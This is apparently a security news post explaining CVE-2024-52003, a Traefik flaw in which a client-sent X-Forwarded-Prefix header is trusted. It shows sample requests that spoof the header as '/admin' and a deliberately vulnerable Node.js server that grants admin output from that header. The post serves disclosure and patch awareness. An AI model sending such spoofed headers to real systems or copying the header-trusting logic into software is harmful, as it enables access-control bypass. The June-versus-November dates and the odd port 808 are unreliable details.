CVE CyberSecurity Database News

CVE-2024-52003 - Traefik ‘X-Forwarded-Prefix’ Header Vulnerability Explained with Exploit Example

Poster -

Traefik (pronounced "traffic") is an open-source HTTP reverse proxy and load balancer, used widely to manage requests to microservices and applications. On June 2024, security researchers publicly disclosed a new security vulnerability affecting Traefik—CVE-2024-52003. This post gives you a simple but exclusive walkthrough of this CVE, with code snippets, a demonstration exploit, and everything you need to know to keep your systems safe.

What is the CVE About?

The vulnerability affects how Traefik processes the X-Forwarded-Prefix HTTP header. Typically, this header is supplied by a trusted proxy to denote the path prefix before a request reaches Traefik. Prior to patch versions, Traefik would trust this header even if sent by untrusted end users, potentially allowing clients to manipulate internal routing or even bypass security controls.

Original References

- GitHub Advisory: GHSA-pfx2-gx8p-9fj7
- CVE-2024-52003 entry at cve.org
- Traefik release notes

Traefik v3: All versions before 3.2.1

All users running affected versions and exposing Traefik to untrusted clients may be at risk.

How the Vulnerability Works

Normally, only trusted proxies should add the X-Forwarded-Prefix header. Traefik trusted the header regardless of source—meaning *any* client could add this header to their requests:

Potential Exploits

Imagine you have a backend route at /admin that’s protected, and normal users should only get access to /user. With this vulnerability, a malicious user might send:

GET /user HTTP/1.1
Host: myapp.example.com
X-Forwarded-Prefix: /admin

If the backend blindly trusts the X-Forwarded-Prefix provided by Traefik, it could serve up admin content to a normal user.

Example Malicious Request (Exploit Snippet)

GET /profile HTTP/1.1
Host: app.example.com
X-Forwarded-Prefix: /admin

# This tricks backend logic into thinking the client is on /admin/profile

Here’s a simple Node.js server illustrating what could happen

const http = require('http');
const server = http.createServer((req, res) => {
  const prefix = req.headers['x-forwarded-prefix'] || '';
  if (prefix.startsWith('/admin')) {
    res.end('Hello, Admin!');
  } else {
    res.end('Hello, User!');
  }
});
server.listen(808);

By sending a request with X-Forwarded-Prefix: /admin, any user can get admin-level access.

No Known Workarounds

As per the official GitHub advisory, there are no safe temporary mitigations or workarounds for CVE-2024-52003. Filtering or removing the header upstream is not always possible or reliable.

How to Fix

Immediate Action:

Upgrade to Traefik v3.2.1 (if you’re on v3)

Get the latest versions from Traefik’s releases page.

Wrapping Up

CVE-2024-52003 is a critical, easy-to-exploit bug in Traefik’s handling of X-Forwarded-Prefix. There’s no reliable workaround, so don’t delay—upgrade to the latest Traefik now.

Stay safe—use only trusted headers, upgrade your infrastructure regularly, and monitor your logs!

*Original references: GHSA-pfx2-gx8p-9fj7 advisory, CVE-2024-52003 detail*.

Timeline

Published on: 11/29/2024 19:15:08 UTC